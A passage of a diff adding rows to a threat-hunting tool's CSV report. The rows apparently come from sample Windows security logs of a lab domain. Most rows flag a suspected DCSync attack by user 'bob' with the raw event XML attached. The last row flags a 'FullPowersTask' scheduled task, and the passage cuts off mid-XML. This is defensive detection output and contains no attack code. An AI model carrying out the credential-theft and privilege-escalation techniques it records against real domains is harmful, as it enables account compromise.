+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
+    </TimeCreated>
+    <EventRecordID>198242590</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""3300"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">A1AA38AA-447E-46C2-ABA0-D205D4D8F873</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.022631Z"">
+    </TimeCreated>
+    <EventRecordID>198242589</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">2EA9670C-F0F9-4D3F-90E5-A087E8C05863</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.022631Z"">
+    </TimeCreated>
+    <EventRecordID>198242588</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""896"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">2EA9670C-F0F9-4D3F-90E5-A087E8C05863</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4698</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12804</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-07T13:17:38.534995Z"">
+    </TimeCreated>
+    <EventRecordID>282588</EventRecordID>
+    <Correlation ActivityID=""1CC43E9D-F481-0001-373F-C41C81F4D501"">
+    </Correlation>
+    <Execution ProcessID=""620"" ThreadID=""672"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""TaskName"">\FullPowersTask</Data>
+    <Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; 
+&lt;Task version=&quot;1.3&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt; 
+  &lt;RegistrationInfo&gt; 
+    &lt;URI&gt;\FullPowersTask&lt;/URI&gt; 
+  &lt;/RegistrationInfo&gt; 
+  &lt;Triggers /&gt; 
+  &lt;Principals&gt; 
+    &lt;Principal id=&quot;Author&quot;&gt; 
+      &lt;UserId&gt;S-1-5-19&lt;/UserId&gt; 
